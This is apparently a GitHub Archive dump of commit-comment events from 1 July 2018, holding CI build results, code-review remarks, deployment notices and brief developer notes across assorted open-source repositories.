{"id":"7903816924","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29559780,"position":null,"line":null,"path":null,"commit_id":"674b5ef74249ff202a2e6330ae005cc573c2ba50","created_at":"2018-07-01T22:50:21Z","updated_at":"2018-07-01T22:50:21Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2926 of 2929 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 622\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-01T22:50:21Z"}
{"id":"7903818745","type":"CommitCommentEvent","actor":{"login":"richiesme"},"repo":{"name":"richiesme/PixelArtMaker"},"payload":{"comment":{"id":29559783,"position":null,"line":null,"path":null,"commit_id":"17d091b636599caf032b6632f9dc245191322a13","created_at":"2018-07-01T22:51:50Z","updated_at":"2018-07-01T22:51:50Z","author_association":"OWNER","body":"set default value of height and width back to 1"}},"created_at":"2018-07-01T22:51:50Z"}
{"id":"7903821673","type":"CommitCommentEvent","actor":{"login":"Adsxcode"},"repo":{"name":"Adsxcode/Hello-World."},"payload":{"comment":{"id":29559787,"position":null,"line":null,"path":null,"commit_id":"afa3251d35f56a506b54604f0db4717f64ad51ef","created_at":"2018-07-01T22:54:07Z","updated_at":"2018-07-01T22:54:07Z","author_association":"OWNER","body":"Hi, i am umar the new coded boy to this great community"}},"created_at":"2018-07-01T22:54:07Z"}
{"id":"7903821929","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29559788,"position":null,"line":null,"path":null,"commit_id":"aeb3d46acf0da28b162ead2c62cd8ae4884a2f56","created_at":"2018-07-01T22:54:18Z","updated_at":"2018-07-01T22:54:18Z","author_association":"OWNER","body":"LLR: -0.67 (-2.94,2.94) [0.00,5.00]\r\nTotal: 585 W: 115 L: 142 D: 328"}},"created_at":"2018-07-01T22:54:18Z"}
{"id":"7903826836","type":"CommitCommentEvent","actor":{"login":"cjacobs-ibm"},"repo":{"name":"cjacobs-ibm/sample-cloud-native-toolchain-tutorial-20180701204622477"},"payload":{"comment":{"id":29559799,"position":null,"line":null,"path":null,"commit_id":"f8ba2930d9709804388f3544005ac13d41f7ff06","created_at":"2018-07-01T22:58:17Z","updated_at":"2018-07-01T22:58:17Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ffaad832-ddb3-411c-9164-0a0222d9339e?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180701204622477\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/9007521e-b88e-4bd7-b091-063159905053?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180701204622477\") deployed [sample-cloud-native-toolchain-tutorial-20180701204622477](https://github.com/cjacobs-ibm/sample-cloud-native-toolchain-tutorial-20180701204622477/releases/tag/deploy-ibm-yp-us-south-cjacobs-us.ibm.com-test-20180701-225816 \"deploy-ibm-yp-us-south-cjacobs-us.ibm.com-test-20180701-225816\") to [test](https://console.bluemix.net/apps/9196165c-f9ff-4983-9da8-a325e5c8cfef?env_id=ibm:yp:us-south \"ibm:yp:us-south:cjacobs@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-01T22:58:17Z"}
{"id":"7903827271","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29559800,"position":null,"line":null,"path":null,"commit_id":"505ed39a2dcac1e18cb73e8b07044252828e3bcc","created_at":"2018-07-01T22:58:37Z","updated_at":"2018-07-01T22:58:37Z","author_association":"OWNER","body":"yes, i remember. Now we also see the reason behind this ;)\r\n\r\nThe problem with that approach was, that there are variables which must be re-initialized, and others don't. And that requires careful examination of each of them."}},"created_at":"2018-07-01T22:58:37Z"}
{"id":"7903828525","type":"CommitCommentEvent","actor":{"login":"polyzen"},"repo":{"name":"python-security/pyt"},"payload":{"comment":{"id":29559804,"position":null,"line":null,"path":null,"commit_id":"3c4d7734a44ec37b15a5f8e8e872f0af6c1af959","created_at":"2018-07-01T22:59:38Z","updated_at":"2018-07-01T22:59:38Z","author_association":"NONE","body":"This seems wrong."}},"created_at":"2018-07-01T22:59:38Z"}
{"id":"7903830912","type":"CommitCommentEvent","actor":{"login":"m-tmatma"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29559812,"position":28,"line":28,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-01T23:01:19Z","updated_at":"2018-07-01T23:01:19Z","author_association":"MEMBER","body":"この条件コンパイルの目的は SetPriorityClass に必要なシステムヘッダをインクルードしているのを保証させことてすか?\r\n\r\nそれなら単純にここで windows.h をインクルードしてやったほうがいいと思います。\r\n"}},"created_at":"2018-07-01T23:01:19Z"}
{"id":"7903831361","type":"CommitCommentEvent","actor":{"login":"cjacobs-ibm"},"repo":{"name":"cjacobs-ibm/sample-cloud-native-toolchain-tutorial-20180701204622477"},"payload":{"comment":{"id":29559814,"position":null,"line":null,"path":null,"commit_id":"f8ba2930d9709804388f3544005ac13d41f7ff06","created_at":"2018-07-01T23:01:40Z","updated_at":"2018-07-01T23:01:40Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ffaad832-ddb3-411c-9164-0a0222d9339e?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180701204622477\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/9007521e-b88e-4bd7-b091-063159905053?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180701204622477\") deployed [sample-cloud-native-toolchain-tutorial-20180701204622477](https://github.com/cjacobs-ibm/sample-cloud-native-toolchain-tutorial-20180701204622477/releases/tag/deploy-ibm-yp-us-south-cjacobs-us.ibm.com-prod-20180701-230139 \"deploy-ibm-yp-us-south-cjacobs-us.ibm.com-prod-20180701-230139\") to [prod](https://console.bluemix.net/apps/37eeb1d3-1cf2-414d-aa0b-352a0ebf7840?env_id=ibm:yp:us-south \"ibm:yp:us-south:cjacobs@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-01T23:01:40Z"}
{"id":"7903833788","type":"CommitCommentEvent","actor":{"login":"xuf12"},"repo":{"name":"fastai/fastai"},"payload":{"comment":{"id":29559817,"position":null,"line":null,"path":null,"commit_id":"fb3e24cf98e39f7c8b7f3344d6411f1cbfbb804b","created_at":"2018-07-01T23:03:31Z","updated_at":"2018-07-01T23:03:31Z","author_association":"NONE","body":"this commit threw an error when running learner.fit_opt_sched():\r\n\r\n> AttributeError: 'RNN_Encoder' object has no attribute 'n_layers'"}},"created_at":"2018-07-01T23:03:31Z"}
{"id":"7903834344","type":"CommitCommentEvent","actor":{"login":"BHMOO028"},"repo":{"name":"BHMOO028/Lm1-Spidice-"},"payload":{"comment":{"id":29559818,"position":null,"line":null,"path":null,"commit_id":"933c91ab9806bfe0b4a78e9a46dd8cbc47d5cacf","created_at":"2018-07-01T23:03:58Z","updated_at":"2018-07-01T23:03:58Z","author_association":"OWNER","body":"Sole owner G. MOORE. ALL RIGHTS RESERVED. "}},"created_at":"2018-07-01T23:03:58Z"}
{"id":"7903834786","type":"CommitCommentEvent","actor":{"login":"m-tmatma"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29559819,"position":56,"line":56,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-01T23:04:17Z","updated_at":"2018-07-01T23:04:17Z","author_association":"MEMBER","body":"関数定義の括弧 '{' は独立した行にいれるのが c++ では普通だと思います。\r\n\r\n既存のコードがそうなっていたら、それでいいと思うのですが、\r\n他のコードは '{' は独立した行に置かれているように思います。\r\n\r\nJava では関数定義の末尾に  '{' を置くのが標準だと思いますが。\r\n\r\n"}},"created_at":"2018-07-01T23:04:17Z"}
{"id":"7903836721","type":"CommitCommentEvent","actor":{"login":"Phahou"},"repo":{"name":"Phahou/unixconv"},"payload":{"comment":{"id":29559821,"position":129,"line":189,"path":"idsort.c","commit_id":"86499ac44963f338c7f4c2def05b5706cd51511a","created_at":"2018-07-01T23:05:51Z","updated_at":"2018-07-01T23:05:51Z","author_association":"OWNER","body":"TODO: add dynamic line recognition-> could be implemented with lineno bc it is the line number ohh god lol"}},"created_at":"2018-07-01T23:05:51Z"}
{"id":"7903837287","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29559822,"position":null,"line":null,"path":null,"commit_id":"392cfd1ab1155b01cbbd69b26e2d0ad924924087","created_at":"2018-07-01T23:06:19Z","updated_at":"2018-07-01T23:06:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Связи: убрать пересечение линиями систем.](https://trello.com/c/yQixgBdA/25-%D1%81%D0%B2%D1%8F%D0%B7%D0%B8-%D1%83%D0%B1%D1%80%D0%B0%D1%82%D1%8C-%D0%BF%D0%B5%D1%80%D0%B5%D1%81%D0%B5%D1%87%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BB%D0%B8%D0%BD%D0%B8%D1%8F%D0%BC%D0%B8-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC)"}},"created_at":"2018-07-01T23:06:19Z"}
{"id":"7903837388","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29559823,"position":null,"line":null,"path":null,"commit_id":"674b5ef74249ff202a2e6330ae005cc573c2ba50","created_at":"2018-07-01T23:06:24Z","updated_at":"2018-07-01T23:06:24Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2921 of 2929 tests passed, 162 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 155 tests had: BND diffs.\n * 34 tests had: RDD diffs.\n * 5 tests had: MDD diffs.\n * 8 tests had: MTD diffs.\n * 5 tests had: Table big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 622\n * Failed: 3\n\nregression Test Summary\n * Passed: 618\n * Failed: 5\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.73%25-yellow.png)</a> \n"}},"created_at":"2018-07-01T23:06:24Z"}
{"id":"7903837716","type":"CommitCommentEvent","actor":{"login":"Phahou"},"repo":{"name":"Phahou/unixconv"},"payload":{"comment":{"id":29559824,"position":null,"line":null,"path":null,"commit_id":"86499ac44963f338c7f4c2def05b5706cd51511a","created_at":"2018-07-01T23:06:41Z","updated_at":"2018-07-01T23:06:41Z","author_association":"OWNER","body":"TODO: clean up comments"}},"created_at":"2018-07-01T23:06:41Z"}
{"id":"7903838764","type":"CommitCommentEvent","actor":{"login":"Phahou"},"repo":{"name":"Phahou/unixconv"},"payload":{"comment":{"id":29559825,"position":88,"line":153,"path":"io.c","commit_id":"86499ac44963f338c7f4c2def05b5706cd51511a","created_at":"2018-07-01T23:07:32Z","updated_at":"2018-07-01T23:07:32Z","author_association":"OWNER","body":"this doesn't seem right"}},"created_at":"2018-07-01T23:07:32Z"}
{"id":"7903838883","type":"CommitCommentEvent","actor":{"login":"m-tmatma"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29559826,"position":76,"line":76,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-01T23:07:37Z","updated_at":"2018-07-01T23:07:37Z","author_association":"MEMBER","body":"SetPriorityClass の結果を assert するのは間違っています。\r\nassert は論理的に常に成立する条件を保証するためのものだからです。\r\n\r\n"}},"created_at":"2018-07-01T23:07:37Z"}
{"id":"7903839118","type":"CommitCommentEvent","actor":{"login":"ang040812"},"repo":{"name":"ang040812/angie.github.io"},"payload":{"comment":{"id":29559829,"position":null,"line":null,"path":null,"commit_id":"d6d0aeb591e431b46d15ced310cbb849dc762078","created_at":"2018-07-01T23:07:51Z","updated_at":"2018-07-01T23:07:51Z","author_association":"OWNER","body":"no lo necesito"}},"created_at":"2018-07-01T23:07:51Z"}
{"id":"7903843190","type":"CommitCommentEvent","actor":{"login":"Darthrighteous"},"repo":{"name":"Darthrighteous/MyDiary"},"payload":{"comment":{"id":29559838,"position":null,"line":null,"path":null,"commit_id":"fbea85219088fd1a3646eeac7cfb87511bf6e31a","created_at":"2018-07-01T23:11:14Z","updated_at":"2018-07-01T23:11:14Z","author_association":"OWNER","body":"ignore"}},"created_at":"2018-07-01T23:11:14Z"}
{"id":"7903843215","type":"CommitCommentEvent","actor":{"login":"pvajko"},"repo":{"name":"Courseplay/courseplay"},"payload":{"comment":{"id":29559839,"position":null,"line":null,"path":null,"commit_id":"69c7b88a3934ee3b9a46b0b414d1ce087b4e9506","created_at":"2018-07-01T23:11:15Z","updated_at":"2018-07-01T23:11:15Z","author_association":"NONE","body":"Tagged the next one, that's in a much better shape than this. I just don't like tags show up as releases on Github.\r\n\r\nSo what interesting stuff you have in your branches?"}},"created_at":"2018-07-01T23:11:15Z"}
{"id":"7903843662","type":"CommitCommentEvent","actor":{"login":"adetayonathanniel"},"repo":{"name":"adetayonathanniel/My-Project"},"payload":{"comment":{"id":29559841,"position":null,"line":null,"path":null,"commit_id":"25a048ba89bbf53adb9fb7a152c0a58be2fa4f3c","created_at":"2018-07-01T23:11:35Z","updated_at":"2018-07-01T23:11:35Z","author_association":"OWNER","body":" https://adetayonathanniel.github.io/My-Project/."}},"created_at":"2018-07-01T23:11:35Z"}
{"id":"7903843735","type":"CommitCommentEvent","actor":{"login":"ciscoheat"},"repo":{"name":"haxetink/tink_cli"},"payload":{"comment":{"id":29559842,"position":null,"line":null,"path":null,"commit_id":"0c9507741b89e86e7c7a72933899bbdad1aef895","created_at":"2018-07-01T23:11:39Z","updated_at":"2018-07-01T23:11:39Z","author_association":"NONE","body":"@kevinresol can you cherry-pick this commit into master and release a new version on haxelib? This is what's needed for travix to work again, since it should just pass all arguments as rest arguments."}},"created_at":"2018-07-01T23:11:39Z"}
{"id":"7903844169","type":"CommitCommentEvent","actor":{"login":"adetayonathanniel"},"repo":{"name":"adetayonathanniel/My-Project"},"payload":{"comment":{"id":29559843,"position":1,"line":1,"path":"README.md","commit_id":"25a048ba89bbf53adb9fb7a152c0a58be2fa4f3c","created_at":"2018-07-01T23:11:57Z","updated_at":"2018-07-01T23:11:57Z","author_association":"OWNER","body":" https://adetayonathanniel.github.io/My-Project/."}},"created_at":"2018-07-01T23:11:57Z"}
{"id":"7903849123","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29559856,"position":null,"line":null,"path":null,"commit_id":"674b5ef74249ff202a2e6330ae005cc573c2ba50","created_at":"2018-07-01T23:16:05Z","updated_at":"2018-07-01T23:16:05Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2961 of 2969 tests passed, 165 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 155 tests had: BND diffs.\n * 34 tests had: RDD diffs.\n * 5 tests had: MDD diffs.\n * 8 tests had: MTD diffs.\n * 5 tests had: Table big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 3\n\nregression Test Summary\n * Passed: 638\n * Failed: 5\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.73%25-yellow.png)</a> \n"}},"created_at":"2018-07-01T23:16:05Z"}
{"id":"7903853953","type":"CommitCommentEvent","actor":{"login":"NewtonGrav"},"repo":{"name":"NewtonGrav/N-mero-primo"},"payload":{"comment":{"id":29559865,"position":10,"line":10,"path":"Nros_Primos.py","commit_id":"fa058361234f7c8367e93f5d95986bf7cd866b38","created_at":"2018-07-01T23:20:04Z","updated_at":"2018-07-01T23:20:04Z","author_association":"OWNER","body":"expire"}},"created_at":"2018-07-01T23:20:04Z"}
{"id":"7903854316","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29559868,"position":null,"line":null,"path":null,"commit_id":"505ed39a2dcac1e18cb73e8b07044252828e3bcc","created_at":"2018-07-01T23:20:22Z","updated_at":"2018-07-01T23:20:22Z","author_association":"NONE","body":"Yup, but the main reason for that is that the ROM image is basically three\napplications merged together. If we could treat the AES and Desk bss and\ndata sections separate from the rest, it would mostly cover the different\ncases.\n\nOn Mon, Jul 2, 2018, 00:58 Thorsten Otto <notifications@github.com> wrote:\n\n> yes, i remember. Now we also see the reason behind this ;)\n>\n> The problem with that approach was, that there are variables which must be\n> re-initialized, and others don't. And that requires careful examination of\n> each of them.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/th-otto/pTOS/commit/505ed39a2dcac1e18cb73e8b07044252828e3bcc#commitcomment-29559800>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADT4sVbbTQy0hArxw8XAf_aOTVov8vbOks5uCVQegaJpZM4U-X27>\n> .\n>\n"}},"created_at":"2018-07-01T23:20:22Z"}
{"id":"7903854491","type":"CommitCommentEvent","actor":{"login":"MatthieuHernandez"},"repo":{"name":"Seivin/chess"},"payload":{"comment":{"id":29559869,"position":null,"line":null,"path":null,"commit_id":"69f9bb0287ab8580e4f7fac2b6c5a90b7d3a6398","created_at":"2018-07-01T23:20:31Z","updated_at":"2018-07-01T23:20:31Z","author_association":"NONE","body":"1 class by file .h and .cpp"}},"created_at":"2018-07-01T23:20:31Z"}
{"id":"7903854853","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29559872,"position":null,"line":null,"path":null,"commit_id":"674b5ef74249ff202a2e6330ae005cc573c2ba50","created_at":"2018-07-01T23:20:48Z","updated_at":"2018-07-01T23:20:48Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-674b5ef74249ff202a2e6330ae005cc573c2ba50-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-01T23:20:48Z"}
{"id":"7903854944","type":"CommitCommentEvent","actor":{"login":"blinks"},"repo":{"name":"garykac/woven"},"payload":{"comment":{"id":29559873,"position":2,"line":1,"path":"README.md","commit_id":"1ef88241e9079219805b4dc0ba4ce8a65330d29c","created_at":"2018-07-01T23:20:53Z","updated_at":"2018-07-01T23:20:53Z","author_association":"CONTRIBUTOR","body":"Yay!"}},"created_at":"2018-07-01T23:20:53Z"}
{"id":"7903865222","type":"CommitCommentEvent","actor":{"login":"alex-hhh"},"repo":{"name":"alex-hhh/frog"},"payload":{"comment":{"id":29559884,"position":null,"line":null,"path":null,"commit_id":"e6da79ec693f46b31017faf026184ee2700fde5c","created_at":"2018-07-01T23:29:22Z","updated_at":"2018-07-01T23:29:22Z","author_association":"OWNER","body":"This code has at least two bugs and it is missing tests, documentation and sample templates.  I do not have time to work on these, however.  \r\n\r\nYou are welcome to use this code as-is, or you can improve it and submit a pull request.  If you want to work on the bugs, they are:\r\n\r\n* the old and new posts for the side bar are not checked for duplicates, so this results in duplicate links if the site is re-generated without cleaning it first\r\n* previously generated pages will not be re-generated with a new side bar if posts are added/deleted\r\n\r\nI currently work around these bugs by cleaning the generated files using `raco frog -c`, before generating the site again."}},"created_at":"2018-07-01T23:29:22Z"}
{"id":"7903867290","type":"CommitCommentEvent","actor":{"login":"tonyahowe"},"repo":{"name":"tonyahowe/LiC"},"payload":{"comment":{"id":29559891,"position":null,"line":null,"path":null,"commit_id":"3f5b55c6eda6806dc3f4d10c827942e49c2264cf","created_at":"2018-07-01T23:31:02Z","updated_at":"2018-07-01T23:31:02Z","author_association":"OWNER","body":"Sounds good! We can work through it tomorrow. "}},"created_at":"2018-07-01T23:31:02Z"}
{"id":"7903867393","type":"CommitCommentEvent","actor":{"login":"uzanka"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29559892,"position":56,"line":56,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-01T23:31:07Z","updated_at":"2018-07-01T23:31:07Z","author_association":"NONE","body":"最近流行のGoogle styleでは、\"{\"は改行しないで関数の後ろに置きます。\r\n"}},"created_at":"2018-07-01T23:31:07Z"}
{"id":"7903868489","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29559894,"position":23,"line":4825,"path":"src/map/lua/lua_baseentity.cpp","commit_id":"22d6a6208de337bb126019ff4a9b6addb1b2d776","created_at":"2018-07-01T23:31:56Z","updated_at":"2018-07-01T23:31:56Z","author_association":"MEMBER","body":"okaaaay hows it getting changed now then? at this point the function is really \"rebuild my char stats and shove the update packet(s) at the client\""}},"created_at":"2018-07-01T23:31:56Z"}
{"id":"7903869034","type":"CommitCommentEvent","actor":{"login":"marcusbusola"},"repo":{"name":"marcusbusola/pixelartproject"},"payload":{"comment":{"id":29559895,"position":9,"line":6,"path":"README.md","commit_id":"702f9d09198a4ea9c4c7771045e05f56ec51d451","created_at":"2018-07-01T23:32:24Z","updated_at":"2018-07-01T23:32:24Z","author_association":"OWNER","body":"link to the site on github pages https://marcusbusola.github.io/pixelartproject/"}},"created_at":"2018-07-01T23:32:24Z"}
{"id":"7903870459","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29559898,"position":null,"line":null,"path":null,"commit_id":"54c13e6e12b25b33122bd416c5c1af69e8c155fe","created_at":"2018-07-01T23:33:32Z","updated_at":"2018-07-01T23:33:32Z","author_association":"OWNER","body":"@buxstore  back from holiday sorry about that\r\n\r\ncuballoon is sorted now "}},"created_at":"2018-07-01T23:33:32Z"}
{"id":"7903873917","type":"CommitCommentEvent","actor":{"login":"simcoder"},"repo":{"name":"nicky-lenaers/ngx-scroll-tracker"},"payload":{"comment":{"id":29559906,"position":null,"line":null,"path":null,"commit_id":"cc28537f3a35f3e4a63cf2d3968af7b7067bfaa8","created_at":"2018-07-01T23:36:28Z","updated_at":"2018-07-01T23:36:28Z","author_association":"NONE","body":"@nicky-lenaers are you open for me to contribute to this ?"}},"created_at":"2018-07-01T23:36:28Z"}
{"id":"7903873942","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"apmuthu/FA24extensions"},"payload":{"comment":{"id":29559907,"position":14,"line":27,"path":"Extensions/sales_map/sales_map.php","commit_id":"2bae815fa1de84b98b63e0e74db945ae6fcb30b2","created_at":"2018-07-01T23:36:30Z","updated_at":"2018-07-01T23:36:30Z","author_association":"OWNER","body":"Localise file for self sufficiency"}},"created_at":"2018-07-01T23:36:30Z"}
{"id":"7903874572","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29559912,"position":null,"line":null,"path":null,"commit_id":"e08bbf3544bf51bb9bf67797ae2be254dc13a23f","created_at":"2018-07-01T23:37:01Z","updated_at":"2018-07-01T23:37:01Z","author_association":"NONE","body":"Note that target_rpi2 kernels can run on Raspberry PI 3 boards as well as 2. "}},"created_at":"2018-07-01T23:37:01Z"}
{"id":"7903877219","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"apmuthu/FA24extensions"},"payload":{"comment":{"id":29559914,"position":88,"line":29,"path":"Extensions/sales_map/sales_map.php","commit_id":"2bae815fa1de84b98b63e0e74db945ae6fcb30b2","created_at":"2018-07-01T23:38:59Z","updated_at":"2018-07-01T23:38:59Z","author_association":"OWNER","body":"The file must be downloaded and the `.txt` removed from the filename and then included form within the extension folder."}},"created_at":"2018-07-01T23:38:59Z"}
{"id":"7903879105","type":"CommitCommentEvent","actor":{"login":"kidawa"},"repo":{"name":"kidawa/code"},"payload":{"comment":{"id":29559915,"position":59,"line":59,"path":"tic-tac-toe-app/tic-tac-toe/tic-tac-toe/ViewController.swift","commit_id":"f5a39fbb6f06541c5bc0159604672c71300579ca","created_at":"2018-07-01T23:40:30Z","updated_at":"2018-07-01T23:40:30Z","author_association":"OWNER","body":"//\r\n"}},"created_at":"2018-07-01T23:40:30Z"}
{"id":"7903879367","type":"CommitCommentEvent","actor":{"login":"kidawa"},"repo":{"name":"kidawa/code"},"payload":{"comment":{"id":29559916,"position":null,"line":null,"path":null,"commit_id":"f5a39fbb6f06541c5bc0159604672c71300579ca","created_at":"2018-07-01T23:40:41Z","updated_at":"2018-07-01T23:40:41Z","author_association":"OWNER","body":"//"}},"created_at":"2018-07-01T23:40:41Z"}
{"id":"7903880258","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"apmuthu/FA24extensions"},"payload":{"comment":{"id":29559918,"position":341,"line":372,"path":"Extensions/sales_map/sales_map.php","commit_id":"2bae815fa1de84b98b63e0e74db945ae6fcb30b2","created_at":"2018-07-01T23:41:31Z","updated_at":"2018-07-01T23:41:31Z","author_association":"OWNER","body":"Internalise by local file inclusion.\r\n[leaflet.js.txt](https://github.com/apmuthu/FA24extensions/files/2153341/leaflet.js.txt)\r\n"}},"created_at":"2018-07-01T23:41:31Z"}
{"id":"7903880795","type":"CommitCommentEvent","actor":{"login":"kaglowka"},"repo":{"name":"PrzypisPowszechny/pp-client"},"payload":{"comment":{"id":29559919,"position":null,"line":null,"path":null,"commit_id":"a08e5e9205610815c6cdf0c0b97873449a5275f5","created_at":"2018-07-01T23:42:01Z","updated_at":"2018-07-01T23:42:01Z","author_association":"CONTRIBUTOR","body":"Sorry, I thought we had either discussed it on Slack or at least I just mentioned I was planning to do it;\r\nApparently (hopefully) at least the second is true and it got lost in the stream of messages."}},"created_at":"2018-07-01T23:42:01Z"}
{"id":"7903881538","type":"CommitCommentEvent","actor":{"login":"swissjov"},"repo":{"name":"swissjov/Quizz-App"},"payload":{"comment":{"id":29559921,"position":null,"line":null,"path":null,"commit_id":"c68b59f8865371417f8b92f6e1b63d676a45571a","created_at":"2018-07-01T23:42:39Z","updated_at":"2018-07-01T23:42:39Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1p4z9AwahdI-Fzc6htD1-Y9ab-02zcFbi/view?usp=drivesdk"}},"created_at":"2018-07-01T23:42:39Z"}
{"id":"7903881792","type":"CommitCommentEvent","actor":{"login":"eltang"},"repo":{"name":"UltimateHackingKeyboard/firmware"},"payload":{"comment":{"id":29559922,"position":25,"line":423,"path":"right/src/usb_report_updater.c","commit_id":"84f48ed055b07eebe648b0aaf0fd4e99f80ddb42","created_at":"2018-07-01T23:42:51Z","updated_at":"2018-07-01T23:42:51Z","author_association":"COLLABORATOR","body":"You're absolutely right. I had a feeling something was wrong but couldn't quite put my finger on it."}},"created_at":"2018-07-01T23:42:51Z"}
{"id":"7903883312","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29559926,"position":null,"line":null,"path":null,"commit_id":"b7ef13d385de620e53441eb2a1d36f2ae3eea6a9","created_at":"2018-07-01T23:44:11Z","updated_at":"2018-07-01T23:44:11Z","author_association":"NONE","body":"80000 is only for aarch64, 32 bit kernels compiled for RP3 (which TARGET_RPI3 is) are loaded at 0x8000 as usual. "}},"created_at":"2018-07-01T23:44:11Z"}
{"id":"7903883726","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":29559927,"position":null,"line":null,"path":null,"commit_id":"5f88ba4cfddef6f56e30c4599f26990fca4ba36a","created_at":"2018-07-01T23:44:26Z","updated_at":"2018-07-01T23:44:26Z","author_association":"CONTRIBUTOR","body":"@jef-n , thanks "}},"created_at":"2018-07-01T23:44:26Z"}
